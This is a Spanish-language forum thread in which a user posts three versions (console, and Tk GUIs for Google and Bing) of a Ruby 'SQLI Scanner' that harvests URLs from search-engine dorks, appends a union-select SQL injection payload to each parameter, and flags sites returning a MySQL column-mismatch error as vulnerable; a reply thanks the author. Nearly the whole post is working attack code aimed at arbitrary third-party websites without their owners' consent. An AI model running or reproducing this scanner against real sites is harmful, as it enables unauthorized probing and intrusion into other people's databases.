[Ruby] SQLI Scanner 0.4

Iniciado por BigBear, Agosto 07, 2015, 05:26:17 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Un simple script en Ruby para buscar paginas vulnerables a SQLI usando Google o Bing.

Version consola :

Código: ruby

#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015

require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def uso
print "\n[+] Sintax : ruby scanner.rb <options> <dork> <pages>\n\n"
print "-search_bing : Find in Bing\n"
print "-search_google : Find in Google\n"
print "-scan_bing : Find SQLI in Bing\n"
print "-scan_google : Find SQLI in Google\n"
print "\n[+] Example of use : ruby scanner.rb -scan_bing news.php+id 3\n"
end

def  head
print "\n\n-- == SQLI Scanner 0.4 == --\n\n"
end

def copyright
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end

opcion = ARGV[0]
dork = ARGV[1]
pages  = ARGV[2]

head()

if !opcion or !dork or !pages
uso()
else

if opcion=="-search_bing"

print "\n[+] Searching in Bing ...\n\n"

links = bing(dork,pages)

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-search_google"

print "\n[+] Searching in Google ...\n\n"

links = google(dork,pages)

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = google_recursive(dork,pages)
end

print "[+] Pages Count : "+links.count.to_s

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link+"\n"
end

print "\n[+] Finished\n"

elsif opcion=="-scan_bing"

print "\n[+] Searching in Bing ...\n\n"

links = cortar(bing(dork,pages))

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found\n"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"

elsif opcion=="-scan_google"

print "\n[+] Searching in Google ...\n\n"

links = cortar(google(dork,pages))

if links.count.to_s=="0"
print "[+] Searching in Google again ...\n\n"
links = cortar(google_recursive(dork,pages))
end

print "[+] Pages Count : "+links.count.to_s+"\n\n"

if links.count.to_s=="0"
print "[-] Links not found"
end

links.flatten.each do |link|
print "[+] Link : "+link
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
print " [OK]\n\a\a"
else
print " [FAIL]\n"
end
rescue
print " [FAIL]\n"
end
end

print "\n[+] Finished\n"
else
print "[-] Bad Option"
end
end

copyright()


#The End ?


Version Tk para Google :

Código: ruby

#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Google Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Google" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end",  "[+] Searching in Google ...\n\n")

links = cortar(google(dork,pages))

if links.count.to_s=="0"
console.insert("end",  "[+] Searching in Google again ...\n\n")
links = cortar(google_recursive(dork,pages))
end

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end", "[-] Links not found")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end"," [FAIL]\n")
end
rescue
console.insert("end", " [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Version Tk para Bing :

Código: ruby

#!usr/bin/ruby
#SQLI Scanner 0.4
#(C) Doddy Hackman 2015
#Scan Bing Tk

require "tk"
require "open-uri"
require "net/http"
require "openssl"

# Functions

def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end


def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end


def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end

def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end


def google(dork,pages)

links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&amp;sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end

def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

def bing(dork,pages)

guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10

code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)

links = code.scan(/<h2><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end

links = code.scan(/<h3><a href="(.*?)" h/)

links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end

#

window = TkRoot.new { title "SQLI Scanner 0.4 - Scanner Bing" ; background "black" }
window['geometry'] = '300x320-20+10'

TkLabel.new(window) do
background "black"
foreground "green"
text "    Dork : "
place('relx'=>"0.1",'rely'=>"0.1")
end

dork = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.1)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "    Pages : "
place('relx'=>"0.1",'rely'=>"0.2")
end

pages = TkEntry.new(window){
background "black"
foreground "green"
width 25
place('relx'=>0.3,'rely'=>0.2)
}

TkLabel.new(window) do
background "black"
foreground "green"
text "Console"
place('relx'=>0.4,'rely'=>0.3)
end

console =TkText.new(window) do
background "black"
foreground "green"
width 30
height 9
place('relx'=>0.1,'rely'=>0.4)
end

TkButton.new(window) do
text "Search"
    background "black"
foreground "green"
width 17
activebackground "green"
highlightbackground  "green"
command proc{

dork = dork.value.to_s
pages = pages.value.to_s

console.insert("end", "[+] Searching in Bing ...\n\n")

links = cortar(bing(dork,pages))

console.insert("end", "[+] Pages Count : "+links.count.to_s+"\n\n")

if links.count.to_s=="0"
console.insert("end","[-] Links not found\n")
end

links.flatten.each do |link|
console.insert("end", "[+] Link : "+link)
begin
url = toma(link + "-1+union+select+1--")
if url=~/The used SELECT statements have a different number of columns/
console.insert("end"," [OK]\n\a\a")
else
console.insert("end", " [FAIL]\n")
end
rescue
console.insert("end"," [FAIL]\n")
end
end

console.insert("end",  "\n[+] Finished")

}
place('relx'=>0.3,'rely'=>0.9)
end

Tk.mainloop

#The End ?


Una imagen :



Eso es todo.


@No tienes permitido ver enlaces. Registrate o Entra a tu cuenta


Voy a probarlo, a ver que  sale; no sin antes agradecerte tus continuos aportes a la comunidad.

Gabi.
Tú te enamoraste de mi valentía, yo me enamoré de tu oscuridad; tú aprendiste a vencer tus miedos, yo aprendí a no perderme en tu abismo.